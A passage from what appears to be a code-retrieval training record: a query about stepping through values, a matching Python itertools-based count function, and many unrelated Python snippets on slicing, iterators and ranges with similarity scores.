StopIteration, UnboundLocalError):\n pass", "def convert_slice(slice_, min=None, max=None):\n step = slice_.step\n if slice_.step is None:\n step = 1\n\n sign = -1 if slice_.start > slice_.stop else 1\n start = slice_.start\n step = sign*abs(step)\n stop = slice_.stop + sign\n\n # Limit to min/max\n minf = __builtins__['min']\n maxf = __builtins__['max']\n\n if sign == 1:\n if min is not None:\n start = maxf(min, start)\n if max is not None:\n stop = minf(max + step, stop)\n else:\n if min is not None:\n stop = maxf(min + step, stop)\n if max is not None:\n start = minf(max, start)\n\n return slice(start, stop, step)", "def test_oldclass_and_direct(self):\n class OldStyle:\n def __getitem__(self, index):\n return index\n\n class OldStyleWithLen:\n def __getitem__(self, index):\n return index\n def __len__(self):\n return 10\n\n class NewStyle(object):\n def __getitem__(self, index):\n return index\n\n class OldStyleWithLenAndGetSlice:\n def __getitem__(self, index):\n return index\n def __len__(self):\n return 10\n def __getslice__(self, start, stop):\n return start, stop\n\n # slice object should pass through unmodified if constructed explicitly.\n self.assertEqual(NewStyle()[slice(None, -1, None)], slice(None, -1, None))\n self.assertEqual(OldStyleWithLen()[slice(None, -1, None)], slice(None, -1, None))\n self.assertEqual(OldStyle()[slice(None, -1, None)], slice(None, -1, None))\n self.assertEqual(OldStyleWithLenAndGetSlice()[slice(None, -1, None)], slice(None, -1, None))\n\n # using the slice syntax\n self.assertEqual(NewStyle()[:-1], slice(None, -1, None))\n self.assertEqual(OldStyleWithLen()[:-1], slice(None, -1, None))\n self.assertEqual(OldStyleWithLenAndGetSlice()[:-1], slice(None, -1))\n self.assertEqual(OldStyle()[:-1:1], slice(None, -1, 1))\n self.assertEqual(OldStyle()[:-1], slice(-1))\n self.assertEqual(OldStyle()[-1:], slice(-1, None))\n self.assertEqual(OldStyle()[:-1:None], slice(None, -1, None))\n self.assertEqual(OldStyle()[-1::None], slice(-1, None, None))\n self.assertEqual(OldStyle()[:-1:], slice(None, -1, None))\n self.assertEqual(OldStyle()[-1::], slice(-1, None, None))", "def __getitem__(self, idx):\n if not isinstance(idx, (slice, numbers.Integral)):\n raise ValueError('Index indices must be integers')\n if isinstance(idx, slice):\n if idx.step not in (None, 1):\n raise IndexError('Index does not support variable stepping')\n s, e = None, None\n if idx.start is not None:\n s = idx.start\n if s < 0:\n s += len(self)\n s = self.lookup(s)\n if idx.stop is not None:\n e = idx.stop\n if e >= len(self):\n e = None\n else:\n e = self.lookup(e)\n idx = slice(s, e)\n else:\n idx = self.lookup(idx)\n return self.src[idx]", "def __getitem__(self, k):\n if not isinstance(k, (slice,) + six.integer_types):\n raise TypeError\n assert ((not isinstance(k, slice) and (k >= 0))\n or (isinstance(k, slice) and (k.start is None or k.start >= 0)\n and (k.stop is None or k.stop >= 0))), \\\n \"Negative indexing is not supported.\"\n\n if self._result_cache is not None:\n return self._result_cache[k]\n\n if isinstance(k, slice):\n if k.start is not None:\n self.start = int(k.start)\n else:\n self.start = 0\n if k.stop is not None:\n self.size = int(k.stop) - self.start\n else:\n self.size = self.default_size\n self._fetch_all()\n return self._result_cache\n\n self.start = k\n self.size = 1\n self._fetch_all()\n return self._result_cache[0]", "def convert_slice(g, op, block):\n\n data = g.get_node(op.input(\"Input\")[0])\n dims = len(infer_shape(data))\n\n axes = op.attr(\"axes\")\n indices 
= _expr.const(axes, dtype=\"int64\")\n\n decrease_axis = op.attr(\"decrease_axis\")\n if isinstance(decrease_axis, int):\n decrease_axis = [decrease_axis]\n\n if op.input(\"StartsTensor\"):\n starts = g.get_node(op.input(\"StartsTensor\")[0])\n starts, infered = try_infer_value(starts, g.get_params())\n if infered:\n starts = starts.tolist()\n elif op.input(\"StartsTensorList\"):\n starts = []\n for start_index in op.input(\"StartsTensorList\"):\n start_index = g.get_node(start_index).astype(\"int64\")\n starts.append(start_index)\n starts = _op.concatenate(starts, axis=0)\n starts, infered = try_infer_value(starts, g.get_params())\n if infered:\n starts = starts.tolist()\n else:\n starts = op.attr(\"starts\")\n\n if len(axes) < dims:\n if isinstance(starts, _expr.Expr):\n starts = _op.scatter_elements(\n _op.const([0] * dims, dtype=infer_type(starts).checked_type.dtype),\n indices,\n starts,\n axis=0,\n )\n else:\n base = [0] * dims\n for i, axis in enumerate(axes):\n base[axis] = starts[i]\n starts = base\n\n if op.input(\"EndsTensor\"):\n ends = g.get_node(op.input(\"EndsTensor\")[0])\n ends, infered = try_infer_value(ends, g.get_params())\n if infered:\n ends = ends.tolist()\n elif op.input(\"EndsTensorList\"):\n ends = []\n for end_index in op.input(\"EndsTensorList\"):\n end_index = g.get_node(end_index).astype(\"int64\")\n ends.append(end_index)\n ends = _op.concatenate(ends, axis=0)\n ends, infered = try_infer_value(ends, g.get_params())\n if infered:\n ends = ends.tolist()\n else:\n ends = op.attr(\"ends\")\n\n if len(axes) < dims:\n if isinstance(ends, _expr.Expr):\n ends = _op.scatter_elements(\n _expr.const(\n np.array([np.iinfo(np.int32).max] * dims),\n dtype=infer_type(ends).checked_type.dtype,\n ),\n indices,\n ends,\n axis=0,\n )\n else:\n base = [np.iinfo(np.int32).max] * dims\n for i, axis in enumerate(axes):\n base[axis] = ends[i]\n ends = base\n\n strides = None\n if \"StridesTensor\" in op.input_names and op.input(\"StridesTensor\"):\n strides = g.get_node(op.input(\"StridesTensor\")[0])\n strides, infered = try_infer_value(strides, g.get_params())\n if infered:\n strides = strides.tolist()\n elif \"StridesTensorList\" in op.input_names and op.input(\"StridesTensorList\"):\n strides = []\n for strides_index in op.input(\"StridesTensorList\"):\n strides_index = g.get_node(strides_index).astype(\"int64\")\n strides.append(strides_index)\n strides = _op.concatenate(strides, axis=0)\n strides, infered = try_infer_value(strides, g.get_params())\n if infered:\n strides = strides.tolist()\n elif op.has_attr(\"strides\"):\n strides = op.attr(\"strides\")\n\n if len(axes) < dims:\n if isinstance(strides, _expr.Expr):\n strides = _op.scatter_elements(\n _expr.const(np.array([1] * dims), dtype=infer_type(strides).checked_type.dtype),\n indices,\n strides,\n axis=0,\n )\n elif strides:\n base = [1] * dims\n for i, axis in enumerate(axes):\n base[axis] = strides[i]\n strides = base\n if not strides:\n strides = _op.const([1] * dims, dtype=\"int64\")\n\n out = _op.strided_slice(data, begin=starts, end=ends, strides=strides)\n out_shape = infer_shape(out)\n if decrease_axis and len(out_shape) > 1:\n out = _op.squeeze(out, axis=decrease_axis)\n g.add_node(op.output(\"Out\")[0], out)", "def minibatch_slices_iterator(length: int,\n batch_size: int,\n skip_incomplete: bool = False\n ) -> Generator[slice, None, None]:\n start = 0\n stop1 = (length // batch_size) * batch_size\n while start < stop1:\n yield slice(start, start + batch_size, 1)\n start += batch_size\n if not skip_incomplete 
and start < length:\n yield slice(start, length, 1)", "def __init__(self, iterator):\n self.iterator = []\n while iterator.hasNext():\n self.iterator.append(iterator.next())", "def connection_from_list_slice(list_slice, args=None, connection_type=None,\n edge_type=None, pageinfo_type=None,\n slice_start=0, list_length=0, list_slice_length=None):\n connection_type = connection_type or Connection\n edge_type = edge_type or Edge\n pageinfo_type = pageinfo_type or PageInfo\n\n args = args or {}\n\n before = args.get('before')\n after = args.get('after')\n first = args.get('first')\n last = args.get('last')\n if list_slice_length is None:\n list_slice_length = len(list_slice)\n slice_end = slice_start + list_slice_length\n before_offset = get_offset_with_default(before, list_length)\n after_offset = get_offset_with_default(after, -1)\n\n start_offset = max(\n slice_start - 1,\n after_offset,\n -1\n ) + 1\n end_offset = min(\n slice_end,\n before_offset,\n list_length\n )\n if isinstance(first, int):\n end_offset = min(\n end_offset,\n start_offset + first\n )\n if isinstance(last, int):\n start_offset = max(\n start_offset,\n end_offset - last\n )\n\n # If supplied slice is too large, trim it down before mapping over it.\n _slice = list_slice[\n max(start_offset - slice_start, 0):\n list_slice_length - (slice_end - end_offset)\n ]\n edges = [\n edge_type(\n node=node,\n cursor=offset_to_cursor(start_offset + i)\n )\n for i, node in enumerate(_slice)\n ]\n\n first_edge_cursor = edges[0].cursor if edges else None\n last_edge_cursor = edges[-1].cursor if edges else None\n lower_bound = after_offset + 1 if after else 0\n upper_bound = before_offset if before else list_length\n\n return connection_type(\n edges=edges,\n page_info=pageinfo_type(\n start_cursor=first_edge_cursor,\n end_cursor=last_edge_cursor,\n has_previous_page=isinstance(last, int) and start_offset > lower_bound,\n has_next_page=isinstance(first, int) and end_offset < upper_bound\n )\n )", "def __getslice__(self, i, j):\n return OutputGroup(list.__getslice__(self, i, j))", "def test_simple_slicing(self):\n class only_slice(object):\n def __getitem__(self, index):\n self.res = 'get', index.start, index.stop\n def __setitem__(self, index, value):\n self.res = 'set', index.start, index.stop, value\n def __delitem__(self, index):\n self.res = 'del', index.start, index.stop\n\n class mixed_slice(object):\n def __getitem__(self, index):\n if isinstance(index, slice):\n self.res = 'get', index.start, index.stop\n else:\n raise Exception()\n def __setitem__(self, index, value):\n if isinstance(index, slice):\n self.res = 'set', index.start, index.stop, value\n else:\n raise Exception()\n def __delitem__(self, index):\n if isinstance(index, slice):\n self.res = 'del', index.start, index.stop\n else:\n raise Exception()\n\n for mytype in [only_slice, mixed_slice]:\n x = mytype()\n x[:]\n self.assertEqual(x.res, ('get', None, None))\n\n x[0:]\n self.assertEqual(x.res, ('get', 0, None))\n\n x[1:]\n self.assertEqual(x.res, ('get', 1, None))\n\n x[:100]\n self.assertEqual(x.res, ('get', None, 100))\n\n x[:] = 2\n self.assertEqual(x.res, ('set', None, None, 2))\n\n x[0:] = 2\n self.assertEqual(x.res, ('set', 0, None, 2))\n\n x[1:] = 2\n self.assertEqual(x.res, ('set', 1, None, 2))\n\n x[:100] = 2\n self.assertEqual(x.res, ('set', None, 100, 2))\n\n del x[:]\n self.assertEqual(x.res, ('del', None, None))\n\n del x[0:]\n self.assertEqual(x.res, ('del', 0, None))\n\n del x[1:]\n self.assertEqual(x.res, ('del', 1, None))\n\n del x[:100]\n 
self.assertEqual(x.res, ('del', None, 100))", "def __init__(self, indices: Tuple[int, ...], slices: Tuple[slice, ...] = (slice(0, 0, 0),)):\n self.indices = indices\n self.slices = slices", "def get_slice_from_list(self,list_,start=0,end=None):\r\n start = self._index_to_int(start,True)\r\n if end is not None:\r\n end= self._index_to_int(end)\r\n\r\n return list_[start:end]", "def iterator(self):\n return _uhd_swig.range_vector_t_iterator(self)", "def _create_slice(cls, op, op_t):\n node = cls._common_singa_tensor_to_onnx_node(op, op_t)\n for attr in ['starts', 'ends', 'axes', 'steps']:\n node.input.append(op.name + \":\" + attr)\n return node", "def __init__(self, dataset=None, components=None, element_spec=None):\n super(OwnedIterator, self).__init__()\n\n if dataset is None:\n if (components is None or element_spec is None):\n raise ValueError(\n \"When `dataset` is not provided, both `components` and \"\n \"`element_spec` must be specified.\")\n # pylint: disable=protected-access\n self._element_spec = element_spec\n self._flat_output_types = structure.get_flat_tensor_types(\n self._element_spec)\n self._flat_output_shapes = structure.get_flat_tensor_shapes(\n self._element_spec)\n self._components = components\n self._iterator_resource, = components\n else:\n if (components is not None or element_spec is not None):\n raise ValueError(\n \"When `dataset` is provided, `element_spec` and `components` must \"\n \"not be specified.\")\n self._create_iterator(dataset)\n\n self._get_next_call_count = 0", "def fromiter(cls, args, **assumptions):\n return cls(*tuple(args), **assumptions)", "def __getslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint3___getslice__(self, *args)", "def __getitem__(self, item: SliceLike):\n\n if item == Ellipsis:\n return JaggedArray(data=self.data[...], shape=self.shape[...])\n elif isinstance(item, slice):\n # slow but works\n return self.__class__.from_aoa(self.to_aoa()[item])\n else:\n return self.data[slice(*self._cumsum[item : item + 2])].reshape(\n self.shape[:, item]\n )", "def __setslice__(self, *args):\n return _itkSurfaceSpatialObjectPointPython.vectoritkSurfaceSpatialObjectPoint3___setslice__(self, *args)", "def _create_slice(arr, id, reference_name, slice_start, slice_end):\n url = f\"http://{request.host}{BASE_PATH}/data?id={id}&reference_name={reference_name}&start={slice_start}&end={slice_end}\"\n arr.append({ 'url': url, })", "def slice_during(self, e):\r\n\r\n if not isinstance(e, Epochs):\r\n raise ValueError('e has to be of Epochs type')\r\n\r\n if e.data.ndim > 0:\r\n raise NotImplementedError('e has to be a scalar Epoch')\r\n\r\n if self.ndim != 1:\r\n e_s = 'slicing only implemented for 1-d TimeArrays'\r\n return NotImplementedError(e_s)\r\n i_start = self.index_at(e.start)\r\n i_stop = self.index_at(e.stop)\r\n if e.start > self[i_start]: # make sure self[i_start] is in epoch e\r\n i_start += 1\r\n if e.stop > self[i_stop]: # make sure to include self[i_stop]\r\n i_stop += 1\r\n\r\n return slice(i_start, i_stop)", "def __delslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint2___delslice__(self, *args)", "def subseq(self, start_offset=0, end_offset=None):\n from .core import DURATION_64\n\n def subseq_iter(start_offset, end_offset):\n cur_offset = 0\n for point in self._elements:\n try:\n cur_offset += point[DURATION_64]\n except KeyError:\n raise ValueError(\"HSeq.subseq requires all points to have a %s attribute\" % DURATION_64)\n #Skip until start\n 
if cur_offset < start_offset:\n continue\n\n #Yield points start_offset <= point < end_offset\n if end_offset is None or cur_offset < end_offset:\n yield point\n else:\n raise StopIteration\n return HSeq(subseq_iter(start_offset, end_offset))", "def __iter__(self):\n\n # Open the data reader\n self.data.open()\n\n starts = np.arange(self.start, self.stop, self.chunksize)\n for a, b in zip_longest(starts, starts[1:], fillvalue=self.stop):\n yield self.data.read(a, b, **self.kwargs)", "def __iter__(self):\n self._position = self._size\n return self", "def get_iterator(dataset):\n if context.executing_eagerly():\n iterator = dataset_ops.make_one_shot_iterator(dataset)\n else:\n iterator = dataset_ops.make_initializable_iterator(dataset)\n initialize_iterator(iterator)\n return iterator" ]
[ "0.6592863", "0.6384958", "0.6363769", "0.62649775", "0.61393666", "0.60202515", "0.59986544", "0.5966865", "0.5952172", "0.5857153", "0.5757738", "0.574337", "0.5653791", "0.5642721", "0.56035215", "0.5587913", "0.5578734", "0.5572186", "0.5529783", "0.5510107", "0.5508437", "0.5500182", "0.54971117", "0.5488021", "0.54690593", "0.54680836", "0.5460781", "0.54580855", "0.545602", "0.5444084", "0.54392856", "0.5434571", "0.54335636", "0.5431182", "0.5427369", "0.5421714", "0.54187113", "0.54103214", "0.54044676", "0.53972495", "0.5394975", "0.53918725", "0.5391205", "0.53895587", "0.53895587", "0.5370065", "0.53601116", "0.53559184", "0.53449523", "0.5343511", "0.5341193", "0.53361577", "0.5321521", "0.53208834", "0.5309536", "0.5309161", "0.53077215", "0.53025067", "0.52885133", "0.5285885", "0.527488", "0.5272961", "0.5268177", "0.5267699", "0.52676374", "0.52622277", "0.52618545", "0.5257003", "0.52567315", "0.525449", "0.5249287", "0.52466315", "0.5243029", "0.52387756", "0.52232033", "0.52175426", "0.5217536", "0.5215885", "0.5209616", "0.5207532", "0.5204153", "0.5202871", "0.51999414", "0.5186721", "0.51861167", "0.51723355", "0.51696455", "0.5148806", "0.5144437", "0.51386786", "0.51379585", "0.5135898", "0.51355886", "0.51272285", "0.51235443", "0.5122112", "0.5112418", "0.5107037", "0.510199", "0.50961214" ]
0.6573793
1
Return values starting from start advancing by the given step.
def count(self, start=0, step=1, stop=None):
    out = itertools.count(start, step)
    if stop is not None:
        out = itertools.takewhile(lambda x: x < stop, out)
    return Iter(out)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def drange(start, stop, step):\n values=[]\n r = start\n while r <= stop:\n values.append(r)\n r += step\n return values", "def make_step(self):\n self.step_vals = np.cumsum(self.vals)", "def arange(self, start: float, stop: float, step: float = 1.0) -> None:\n self.values = []\n assert step != 0.0\n while abs(start) < abs(stop):\n self.values.append(start)\n start += step", "def values(self, start: XValue[T], stop: XValue[T], step: XValueDiff[T]) -> \"SortedDict[XValue[T], float]\":\n\n step = step or (stop - start)\n if len(self.breakpoints) == 0:\n num_values = int(math.ceil((stop - start) / step))\n return SortedDict([(start + step * i, self._initial_value) for i in range(num_values)])\n\n curr_xval = start\n curr_value = self.call(start)\n next_index, next_breakpoint, next_value = self._breakpoint_info(self.breakpoints.bisect(start))\n\n sequence = SortedDict()\n while curr_xval < stop:\n sequence[curr_xval] = curr_value\n\n next_xval = min(stop, curr_xval + step)\n while next_breakpoint and next_xval >= next_breakpoint:\n assert next_index is not None # if next_breakpoint is set, next_index should also be set\n curr_value = next_value\n next_index, next_breakpoint, next_value = self._breakpoint_info(next_index + 1)\n curr_xval = next_xval\n\n return sequence", "def train(self, steps):\r\n for e in range(steps):\r\n # do something...\r\n pass\r\n return self.get_value_function()", "def value(self, step):\n raise NotImplementedError", "def sample(self, start, end, step):\n # get frames and values\n frames = floatRange(start, end, step)\n values = self.getValues(frames)\n\n # get points and angles\n angles = []\n points = [Vector2D(*coord) for coord in zip(frames, values)]\n\n for i in range(1, len(points) - 2):\n v1 = points[i - 1] - points[i]\n v2 = points[i + 1] - points[i]\n angles.append(math.degrees(math.pi - v1.angle(v2)))\n\n return [points, angles]", "def step(self):\n rtn = self.loc\n for i in range(0,self.space):\n rtn = self._step(rtn)\n\n self.steps += 1\n self.loc = np.copy(rtn) # necessary?\n\n if self.record_steps:\n self.history = np.concatenate((self.history, [rtn]), axis=0)\n\n assert(self.history.shape == (self.steps, self.dim))\n\n return rtn", "def _incremental_steps(start, end, steps, stepsize=None):\n if stepsize is None: step_size = (end - start) / np.maximum((steps - 1), 1)\n gradient = []\n for i in range(steps):\n value = start + step_size * i\n gradient.append(value)\n\n return gradient[0:steps]", "def step_values(self):\n return self._get_values().copy()", "def _setVals(self, step=0):\n self.step = step", "def value_steps(self, steps):\n return self.initial_value * self.schedule(steps / self.nvalues)", "def step(self, dt):\n return Vector(self.P.x + dt*self.V.x, self.P.y + dt*self.V.y)", "def slice(self, start=0, stop=None, step=1):\n if not isinstance(start, int):\n for item in self.data:\n if start in item:\n start = self.data.index(item)\n if not isinstance(start, int):\n raise ValueError('The start value you entered does not exist in this ALE.')\n if stop is None: stop = len(self.data)\n if not isinstance(stop, int):\n for item in self.data:\n if stop in item:\n stop = self.data.index(item)\n if not isinstance(stop, int):\n raise ValueError('The stop value you entered does not exist in this ALE.')\n if stop < start and step > 1:\n raise ValueError('You have selected a stop value that is earlier than your start value and your step value is positive.')\n result = islice(self.data, start, stop, step)\n return result", "def step(self):\n value = 
self.current_event[\"step\"][\"value\"]\n self.current_value.append(value)", "def drange(start, stop, step):\n elem = start\n while elem <= stop:\n yield elem\n elem += step", "def step(self):\n return _uhd_swig.range_t_step(self)", "def mrange(start, end, steps=1):\n list = []\n i = start\n while i < end:\n list.append(i)\n i += steps\n return list", "def step(v, direction, step_size):\n return [v_i + step_size * direction_i\n for v_i, direction_i in zip(v, direction)]", "def range(start, stop, step=1.):\n start, stop, step = map(float, (start, stop, step))\n\n result = [start]\n current = start\n while current < stop:\n current += step\n result.append(current)\n return result", "def smoothed(sequence, step=1, start=0):\n next_index = start + 1\n last = len(sequence) \n new_sequence = []\n if not step:\n return sequence\n ratio_step = step + 1\n for item in sequence:\n new_sequence.append(item)\n if next_index < last:\n next_item = sequence[next_index]\n ratio = (item + next_item) / (step + 1)\n ratio = int(ratio)\n for x in range(step):\n value = (ratio * x) + item\n new_sequence.append(int(value))\n next_index = next_index + 1\n return new_sequence", "def step(v, direction, step_size):\n return [v_i + step_size * direction_i\n for v_i, direction_i in zip(v, direction)]", "def xSteps(self,start,ziel,steps=10):\n erg=[]\n wert=(ziel-start)/(steps)\n for i in range(1, steps+1):\n erg.append(round(start+wert*i,2))\n return erg", "def step(self):\n return _uhd_swig.meta_range_t_step(self)", "def step (result: list, line: str):\n return result + points (result [-1], line)", "def xfrange(start, stop=None, step=1):\n\tif stop is None:\n\t\tstop = start\n\t\tstart = 0.0\n\tstart = float(start)\n\twhile start < stop:\n\t\tyield start\n\t\tstart += step", "def step(self, frame):\n result = []\n frame = self.process_frame(frame)\n ycords, xcords = frame.nonzero()\n for i in xrange(len(ycords)):\n result.append((ycords[i], xcords[i], frame[ycords[i], xcords[i]]))\n self.result_values.append(result)\n return result", "def sample(self, step=None):\n step = self.step if step is None else step\n ndim = len(self.lower_bounds)\n pts = numpy.zeros(ndim)\n for j in range(ndim):\n step_size = (self.upper_bounds[j] - self.lower_bounds[j]) / (self.nsteps)\n pts[j] = step * step_size + self.lower_bounds[j] + 0.5 * step_size\n return pts", "def compute_step(self, step):\n #print(self.velocity)\n self.position += step * self.velocity\n #print(self.position)", "def step_points(self) -> np.array:\n if self._data is None:\n return np.array([])\n return self._data.index.values", "def get_items(self, start, stop, next_position=None):", "def get_steps(self):\n return self.steps", "def getSteps():", "def interval(start, stop=None, step=1):\n if stop is None:\n start, stop = 0, start\n result = []\n i = start\n while i < stop:\n result.append(i)\n i += step\n return result", "def next_step(self):\n\n y_next = []\n y_next.append(0)\n for i in range(1, len(self.x) - 1):\n x = self.x[i]\n\n y = self.constant* (self.y_current[i + 1] + self.y_current[i - 1] - 2 * self.y_current[i])\\\n + 2 * self.y_current[i] - self.y_previous[i]\n\n y_next.append(y)\n\n y_next.append(0)\n\n self.y_previous = copy.copy(self.y_current)\n self.y_current = copy.copy(y_next)\n\n if self.timestep % 10000 is 0:\n self.timeframes[self.timestep] = copy.copy(self.y_current)\n\n self.timestep += 1", "def fill_step(self):\n while len(self.x_values) < self.num_points\n x_step = self.get_step()\n y_step = self.get_step()\n if x_step == 0 and y_step == 
0:\n continue\n next_x = self.x_values[-1] x x_step\n next_y = self.y_values[-1] + y_step\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def xfrange(start, stop=None, step=None):\n if stop is None:\n stop = float(start)\n start = 0.0\n if step is None:\n step = 1.0\n cur = float(start)\n while cur < stop:\n yield cur\n cur += step", "def step(self, step=None):\n pass", "def step(self):\n return self._step", "def getRange (start, stop, step=1):\r\n result = [n for n in range(start, stop, step)]\r\n return result", "def move(self, step):\n for point in self.points:\n l = min(len(step), len(point.position))\n for i in range(l):\n point.position[i] = step[i]", "def move_next(self, step=1):\n if self._index is not None and len(self) > self._index + step:\n self._index += step\n # if index >= end index of current frame --> recalculate findex\n if self._index >= self._findex * self._flen + self._flen:\n self._findex += int(math.ceil(step / float(self._flen)))\n return self[self._index]\n return None", "def float_range(start, stop, step=1): \n while start < stop:\n yield start\n start += step", "def run(self, step:int=0):\n if step > 0:\n _range = range(self.current_step, self.current_step + step + 1)\n else: # run forever\n _range = itertools.count(self.current_step)\n for step_num in _range:\n self.step()", "def _enumerate_step_points(starting, ending, win_size, step_size):\n try:\n starting = max(int(starting), 0)\n ending = max(int(ending), 0)\n win_size = max(int(win_size), 1)\n step_size = max(int(step_size), 1)\n except (TypeError, ValueError):\n tf.logging.fatal(\n 'step points should be specified by integers, received:'\n '%s, %s, %s, %s', starting, ending, win_size, step_size)\n raise ValueError\n if starting > ending:\n starting, ending = ending, starting\n sampling_point_set = []\n while (starting + win_size) <= ending:\n sampling_point_set.append(starting)\n starting = starting + step_size\n additional_last_point = ending - win_size\n sampling_point_set.append(max(additional_last_point, 0))\n sampling_point_set = np.unique(sampling_point_set).flatten()\n if len(sampling_point_set) == 2:\n # in case of too few samples, adding\n # an additional sampling point to\n # the middle between starting and ending\n sampling_point_set = np.append(\n sampling_point_set, np.round(np.mean(sampling_point_set)))\n _, uniq_idx = np.unique(sampling_point_set, return_index=True)\n return sampling_point_set[np.sort(uniq_idx)]", "def collect(self, start=None, stop=None, step=None):\n counts_compressed = self.counts_compressed()\n if start is None:\n if len(counts_compressed) > 0:\n start = self.values[counts_compressed[0][0]]\n else:\n start = -1.0\n if stop is None:\n if len(counts_compressed) > 1:\n stop = self.values[counts_compressed[-1][0]]\n else:\n stop = 1.0\n if step is None:\n step = (stop - start) / 10.0\n\n counts = self.get_counts(start, stop + step, step)\n current = start\n bins = []\n next_one = current + step\n i = 0\n while next_one <= stop + (step) and i < len(counts):\n start_bin = self.get_bin_index(current)\n stop_bin = self.get_bin_index(next_one)\n bin = {\n \"value_start\": current,\n \"value_stop\": next_one,\n \"bin_index_start\": start_bin,\n \"bin_index_stop\": stop_bin,\n \"count\": counts[i],\n }\n bins.append(bin)\n current = next_one\n next_one = current + step\n i += 1\n return bins", "def step ( self ) :\n return self.__step", "def arange(start=0, stop=None, step=None):\n raise NotImplementedError", "def arange(start: float, stop: float, step: float = 
1.0) -> list[float]:\n start = decimal.Decimal(str(start))\n stop = decimal.Decimal(str(stop))\n step = decimal.Decimal(str(step))\n if step <= 0:\n raise ValueError('Step must be >= 0')\n out = []\n current = start\n while current < stop:\n out.append(float(current))\n current += step\n return out", "def _get_next_point(self):\n #Get the index of the current step in each dimension\n nparams = len(self.transform.get_params())\n indices = [0]*nparams\n #Get the number of steps in each dimension\n lengths = [len(self.steps[i]) for i in range(nparams)]\n\n end = False\n while not end:\n yield [self.steps[i][indices[i]] for i in range(nparams)]\n\n #Increment the index of the last paramenter and then check whether it goes over the end\n indices[-1] += 1\n for p in reversed(range(nparams)):\n if indices[p] == lengths[p]:\n indices[p] = 0\n if p > 0:\n indices[p-1] += 1\n else:\n end = True", "def get_next_steps(self, steps):\n for step in range(steps):\n # Actual calulation: Runge-Kutta 2\n\n # Step 1\n k1 = [\n self.vel * self.dt,\n self.get_next_acc() * self.dt\n ]\n\n # Step 2\n next_pos = self.pos + k1[0] * 0.5\n next_vel = self.vel + k1[1] * 0.5\n self.disps, self.dists = self.get_relative_distances(positions=next_pos)\n k2 = [\n next_vel * self.dt,\n self.get_next_acc(save=False) * self.dt\n ]\n\n # Step 3\n next_pos = self.pos + k2[0] * 0.5\n next_vel = self.vel + k2[1] * 0.5\n self.disps, self.dists = self.get_relative_distances(positions=next_pos)\n k3 = [\n next_vel * self.dt,\n self.get_next_acc(save=False) * self.dt\n ]\n\n # Step 4\n next_pos = self.pos + k3[0]\n next_vel = self.vel + k3[1]\n self.disps, self.dists = self.get_relative_distances(positions=next_pos)\n k4 = [\n next_vel * self.dt,\n self.get_next_acc(save=False) * self.dt\n ]\n\n # Move forward\n self.pos = self.pos + 1/6 * (k1[0] + 2*k2[0] + 2*k3[0] + k4[0])\n self.vel = self.vel + 1/6 * (k1[1] + 2*k2[1] + 2*k3[1] + k4[1])\n\n # Saving of statistics\n self.save_system_information(self.pos, self.vel)", "def step(self, dt):\n \n # get the current stage of the integration\n k_num = self.cstep\n\n for array in self.arrays:\n\n np = array.get_number_of_particles()\n\n # get the mapping for this array and this stage\n to_step = self.step_props[ array.name ][k_num]\n\n for prop in to_step:\n\n initial_prop = to_step[ prop ][0]\n step_prop = to_step[ prop ][1]\n\n initial_arr = array.get( initial_prop )\n step_arr = array.get( step_prop )\n\n updated_array = initial_arr + step_arr * dt\n\n # simply use periodicity for the positions\n if prop in ['x', 'y', 'z']:\n updated_array[numpy.where(updated_array < 0)[0]] += 1\n updated_array[numpy.where(updated_array > 1)[0]] -= 1\n\n array.set( **{prop:updated_array} )\n\n # Increment the step by 1\n self.cstep += 1", "def irange(start, stop, step=1):\n assert float(step) != 0.0, \"Null step in irange.\"\n value = start\n if step > 0:\n while value < stop:\n yield value\n value += step\n else: # step < 0\n while value > stop:\n yield value\n value += step", "def compute_step(self, step):\r\n self.position += step * self.velocity\r\n self.solpos.append(np.copy(self.position)) \r\n self.solvel.append(np.copy(self.velocity)) \r\n self.solvel_mag.append(np.linalg.norm(np.copy(self.velocity)))", "def regular(step, start=0.):\n\n def output(low, high):\n newstart = math.ceil((low - start)/step) * step + start\n return numpy.arange(newstart, high, step, dtype=numpy.float)\n output.func_name = \"regular(%g, start=%g)\" % (step, start)\n return output", "def double_range(start, stop, step):\n 
r = start\n while r < stop:\n yield r\n r += step", "def do_steps(self):\n steps = self.get_step_conf()\n all_step_config = dict()\n for k, v in steps.items():\n tmp_list = list()\n all_step_config[k] = tmp_list\n start = v[\"Start Value\"]\n end = v[\"End Value\"]\n # special handling of edge length\n if(k == \"Edge Length\"):\n start = self.convert_to_tuple(start)\n end = self.convert_to_tuple(end)\n tmp_list.append(str(start))\n while(start != end):\n start = self.add_edge_length(\n start, self.convert_to_tuple(v[\"Step\"]))\n tmp_list.append(str(start))\n print start\n else:\n tmp_list.append(float(start))\n while float(start) < float(end):\n start = float(start) + float(v[\"Step\"])\n tmp_list.append(start)\n return all_step_config", "def frange(start, stop, step):\n i = start\n while i < stop:\n yield i\n i += step", "def _step(self) -> None:", "def generate_list(start: int, stop: int, step: int = 1) -> List[int]:\n # if start == stop:\n # print(start)\n # else:\n # res = []\n # while start < (stop + 1):\n # res.append(start)\n # start += step\n # print(res)\n\n return [item for item in range(start, (stop+step))]", "def _get_steps(self):\n return self.steps", "def x_next( self , x , u , t = 0 , dt = 0.1 , steps = 1 ):\n \n x_next = np.zeros(self.n) # k+1 State vector\n \n # Multiple integration steps\n for i in range(steps):\n \n x_next = self.f(x,u,t) * dt + x\n \n # Multiple steps\n x = x_next\n \n return x_next", "def horde_step(self, observation):", "def step(self, d=1):\n raise NotImplementedError()", "def getLinIterSteps( self, var, index = 0 ):\n\n values = self.getLinIterData( var, index )\n return values[0]", "def step_constant(step):\n return step", "def frange(start, stop, step=1.0):\n i = start\n while i <= stop:\n yield i\n i += step", "def step(self, action):\n # Implement your step method here\n # return (observation, reward, done, info)\n self._state = self._state + action\n # print('Step state:', self._state)\n x, y = self._state\n reward = - (x ** 2 + y ** 2) ** 0.5\n done = abs(x) < 0.01 and abs(y) < 0.01\n next_observation = np.copy(self._state)\n return Step(observation=next_observation, reward=reward, done=done)", "def create_step_samples(self):\n pass # Deferred to subclasses\n\n \"\"\" Example using pod height:\n start_value = self.sim.pod.last_height\n end_value = self.sim.pod.height\n\n # Lerp values to get samples\n samples = start_value + self.step_lerp_pcts * (end_value - start_value) # Or use self.lerp(start_value, end_value), but doing it directly 